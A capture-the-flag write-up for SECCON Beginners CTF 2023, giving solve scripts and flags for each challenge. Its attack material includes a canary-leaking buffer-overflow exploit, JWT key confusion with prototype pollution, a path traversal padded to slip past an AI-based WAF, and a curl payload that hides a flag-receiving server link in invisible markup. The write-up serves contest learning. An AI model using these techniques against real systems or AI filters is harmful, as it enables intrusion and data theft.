# SECCON Beginners CTF 2023 Writeup ![score.beginners.seccon.jp_teams](https://hackmd.io/_uploads/Byo9p-64T.png) ## crypto ### CoughingFox2 > 暗号問題に初めて挑戦する方向けに独自暗号と暗号化した後の出力を配布します。 ご覧の通り、簡易な暗号方式なので解読は簡単です。 解読をお願いします! > > The original cipher for beginners and encrypted text are provided. Needless to say, this cipher is too childish, and that easy to decrypt! So, could you please decrypt it? ```python import math with open('./cipher.txt') as f: exec(f.readline()) xs = [0] * len(cipher) for c in cipher: for i in range(len(cipher)): x = math.sqrt(c - i) if x.is_integer(): xs[i] = x flag = [ord('c')] for x in xs: flag.append(int(x) - flag[-1]) print(''.join([chr(c) for c in flag])) ``` #### Flag `ctf4b{hi_b3g1nner!g00d_1uck_4nd_h4ve_fun!!!}` ### Conquer > なんだか目が回りそうな問題ですね…… ```python from Crypto.Util.number import * def ROR(bits, N, length): for _ in range(N): bits = (bits >> 1) | (bits & 1) * (2 ** (length - 1)) return bits with open('./output.txt') as f: exec(f.readline()) exec(f.readline()) for l in range(1, 100): length = bytes_to_long(b'a' * l).bit_length() c = cipher k = key for i in range(32): c ^= k k = ROR(k, pow(c, 3, length), length) c ^= k flag = long_to_bytes(c) if flag.startswith(b'ctf4b{'): print(flag) ``` #### Flag `ctf4b{SemiCIRCLErCanalsHaveBeenConqueredByTheCIRCLE!!!}` ## misc ### YARO > サーバーにマルウェアが混入している可能性があるので、あなたの完璧なシグネチャで探してください ```python import re from pwn import * def find(flag): io = remote('yaro.beginners.seccon.games', 5003) rules = [] for i in range(0x20, 0x7e + 1): if i == 34 or i == 92: s = f'{flag}\{chr(i)}' else: s = f'{flag}{chr(i)}' rules.append(f'rule flag{i} {{strings: $s{i} = "{s}" condition: $s{i}}}') for rule in rules: io.sendline(bytes(rule, 'ascii')) io.sendline() for rule in rules: io.recvline() io.recvline() io.recvline() io.recvline() io.recvline() found = io.recvline().decode() io.close() match = re.search('([0-9]+)', found) if match is None: return -1 return int(match.group(0)) flag = 'ctf4b' while True: c = find(flag) if c < 0: print(flag) break flag += chr(c) ``` #### Flag `ctf4b{Y3t_An0th3r_R34d_Opp0rtun1ty}` ### polyglot4b > polyglotってなに? たぶんpolyglotを作れるエディタを開発したよ! polyglot4b/sample/sushi.jpg の description に `PNG GIF ASCII` を追加します。 #### Flag `ctf4b{y0u_h4v3_fully_und3r5700d_7h15_p0ly6l07}` ## pwnable ### poem > ポエムを書きました! ``` $ nc poem.beginners.seccon.games 9000 Number[0-4]: -4 ctf4b{y0u_sh0uld_v3rify_the_int3g3r_v4lu3} ``` #### Flag `ctf4b{y0u_sh0uld_v3rify_the_int3g3r_v4lu3}` ### rewriter2 > BOF...? ```python from pwn import * io = remote('rewriter2.beginners.seccon.games', 9001) payload = b'' payload += b'A' * 40 io.sendline(payload) s = io.recvuntil(b'How') i = s.index(b'AAAAA\n') + 6 canary = b'\x00' + s[i:i+7] payload = b'' payload += b'A' * 40 payload += canary payload += b'\x00' * 8 payload += p64(0x4012d6) io.sendline(payload) io.interactive() ``` #### Flag `ctf4b{y0u_c4n_l34k_c4n4ry_v4lu3}` ## reversing ### Half > バイナリファイルってなんのファイルなのか調べてみよう! > > あとこのファイルってどうやって中身を見るんだろう...? ``` $ strings half (省略) ctf4b{ge4_t0_kn0w_the _bin4ry_fi1e_with_s4ring3} (省略) ``` #### Flag `ctf4b{ge4_t0_kn0w_the_bin4ry_fi1e_with_s4ring3}` ### Three > このファイル、中身をちょっと見ただけではフラグは分からないみたい! > > バイナリファイルを解析する、専門のツールとか必要かな? ```python import angr p = angr.Project('./three') state = p.factory.entry_state() sim = p.factory.simulation_manager(state) sim.explore(find=(0x400000 + 0x1315,)) for found in sim.found: print(found.posix.dumps(0).decode()) ``` #### Flag `ctf4b{c4n_y0u_ab1e_t0_und0_t4e_t4ree_sp1it_f14g3}` ## Web ### double check > Double check is very secure. ```javascript const jwt = require("jsonwebtoken"); const { readKeyFromFile, generateRandomString, getAdminPassword } = require("./utils"); (async () => { const r = await fetch('https://double-check.beginners.seccon.games/register', { method: 'POST', headers: { 'Content-Type': 'application/json', }, body: JSON.stringify({ username: 'admin', password: 'password', }), }); cookie = r.headers.get('set-cookie'); payload = '{"username":"admin", "admin":true, "__proto__": { "admin" : true }}'; signed = jwt.sign( payload, readKeyFromFile("keys/public.key"), { algorithm: "HS256" } ); const res = await fetch('https://double-check.beginners.seccon.games/flag', { method: 'POST', headers: { Authorization: signed, Cookie: cookie, }, }); console.log(await res.text()); })(); ``` #### Flag `ctf4b{Pr0707yp3_P0llU710n_f0R_7h3_w1n}` ### Forbidden > You don't have permission to access /flag on this server. `/Flag` にアクセスします。 #### Flag `ctf4b{403_forbidden_403_forbidden_403}` ### aiwaf > AI-WAFを超えてゆけ!! ※AI-WAFは気分屋なのでハックできたりできなかったりします。 `?12345678901234567890123456789012345678901234567890&file=../flag` #### Flag `ctf4b{pr0mp7_1nj3c710n_c4n_br34k_41_w4f}` ### phisher2 > 目に見える文字が全てではないが、過去の攻撃は通用しないはずです。 ``` curl -X POST -H "Content-Type: application/json" -d '{"text":"<span style=\"display: none;\">http://${Flagを送信するサーバー}/ </span>https://phisher2.beginners.seccon.games/foobar"}' https://phisher2.beginners.seccon.games ``` #### Flag `ctf4b{w451t4c4t154w?}`